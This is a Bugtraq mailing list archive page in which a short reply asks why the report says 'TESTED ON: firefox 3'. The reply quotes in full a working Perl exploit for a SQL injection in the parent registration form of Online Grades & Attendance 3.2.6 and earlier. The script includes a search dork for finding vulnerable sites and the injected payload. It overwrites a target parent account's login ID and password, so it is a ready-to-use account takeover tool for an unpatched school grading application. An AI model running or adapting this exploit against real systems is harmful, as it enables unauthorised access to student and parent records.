Bugtraq mailing list archives
Re: (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6-->
From: Jeremy Brown <0xjbrown41 () gmail com>
Date: Mon, 1 Jun 2009 12:55:21 -0400
Why do you include "TESTED ON: firefox 3"? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, <y3nh4ck3r () gmail com> wrote:
#!/usr/bin/perl #------------------------------------------------------------------------------------------------------------------- #(Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6--> #------------------------------------------------------------------------------------------------------------------- # #CMS INFORMATION: # #-->WEB: http://www.onlinegrades.org/ #-->DOWNLOAD: http://www.onlinegrades.org/ #-->DEMO: http://www.onlinegrades.org/demo_info #-->CATEGORY: CMS / Education #-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same # features plus many new features. OG is a web based grade... #-->RELEASED: 2009-02-05 # #CMS VULNERABILITY: # #-->TESTED ON: firefox 3 #-->DORK: "Powered by Online Grades" #-->CATEGORY: SQL INJECTION #-->AFFECT VERSION: <= 3.2.6 #-->Discovered Bug date: 2009-05-21 #-->Reported Bug date: 2009-05-21 #-->Fixed bug date: Not fixed #-->Info patch: Not fixed #-->Author: YEnH4ckEr #-->mail: y3nh4ck3r[at]gmail[dot]com #-->WEB/BLOG: N/A #-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. #-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) # # #------------ #CONDITIONS: #------------ # #gpc_magic_quotes=OFF # #----------------- #PRE-REQUIREMENTS #----------------- # #Option --> Self Registration --> Allowed (Default value) # #------- #NEED: #------- # #Valid parent id # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #Register module (name) is vuln to sql injection. # #Full name --> y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'# # #Other parameters --> something # # #Return: Change client_id to 'owned' for parent id=1 # # ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### ####################################################################### # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit"); system ("color 02"); } } sub request { my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq "post"){ $request = HTTP::Request -> new(POST => $_[0]); $request->referer($_[0]); $request->content_type('application/x-www-form-urlencoded'); $request->content($_[1]); }else{ $request = HTTP::Request -> new(GET => $_[0]); } my $outcode= $userag->request($request)->as_string; return $outcode; } sub error { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t--->Maybe:\n\n"; print "\t\t1.-Patched.\n"; print "\t\t2.-Bad path or host.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub errormagicquotes { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t\tRaison--> Magic quotes ON.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub helper { print "\n\t[!!!] Online Grades & Attendance <= v-3.2.6 (Credentials changer) Exploit\n"; print "\t[!!!] USAGE MODE: [!!!]\n"; print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n"; print "\t[!!!] [HOST]: Web.\n"; print "\t[!!!] [PATH]: Home Path.\n"; print "\t[!!!] [Email Address]: Set value\n"; print "\t[!!!] [Password]: Set value\n"; print "\t[!!!] [Target_id]: victim id\n"; print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'demo' 'y3nh4ck3r' 'y3nh4ck3r' '1' \n"; } #Main &lw; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; print "\t## Online Grades & Attendance <= v-3.2.6 ##\n\n"; print "\t## (Credentials changer) Exploit ##\n\n"; print "\t## ++Conditions: magic_quotes=OFF ##\n\n"; print "\t## ++Needed: Valid parent id ##\n\n"; print "\t## Author: Y3nh4ck3r ##\n\n"; print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n"; print "\t## Proud to be Spanish! ##\n\n"; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $client_id=$ARGV[2]; my $client_pw=$ARGV[3]; $numArgs = $#ARGV + 1; if($numArgs<=3) { &helper; exit(1); } if(!$ARGV[4]){ $target_id=1; }else{ $target_id=$ARGV[4]; } #Build uri my $finalhost="http://".$host."/".$path."/parents/register.php?action=register";; my $phpinfo="http://".$host."/".$path."/include/phpinfo.php";; #sql injection $injection="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$values."'#"; $post="name=".$injection."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($phpinfo,0,'get'); if($output=~(/\<tr\>\<td class\=\"e\">magic\_quotes\_gpc\<\/td\>\<td class\=\"v\"\>On\<\/td\>\<td class\=\"v\"\>On\<\/td\>\<\/tr\>/)){ &errormagicquotes; exit(1); } $injection_email="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$client_id."'#"; $post="name=".$injection_email."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($finalhost, $post, 'post'); $injection_pw="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_pw='".$client_pw."'#"; $post="name=".$injection_pw."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r"; $output=&request($finalhost, $post, 'post'); #processed if($output!~(/\<strong\>ERROR\<\/strong\>/)) { print "\n\t-----------------------------------------------------------------\n"; print "\t-- EXPLOIT EXECUTED (Online Grades & Attendance <= v-3.2.6) --\n"; print "\t-- (Credentials changer) Exploit --\n"; print "\t-----------------------------------------------------------------\n\n"; print "\t\tParent credentials changed!\n\n"; print "\t\tIf id doesn't exist, you add a new inconsistent user!\n\n"; print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n"; print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n"; print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n"; }else{ &error; } exit(1); #Ok...all job done
Current thread:
- (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6--> y3nh4ck3r (Jun 01)
- Re: (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6--> Jeremy Brown (Jun 01)
- <Possible follow-ups>
- Re: Re: (Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6--> y3nh4ck3r (Jun 01)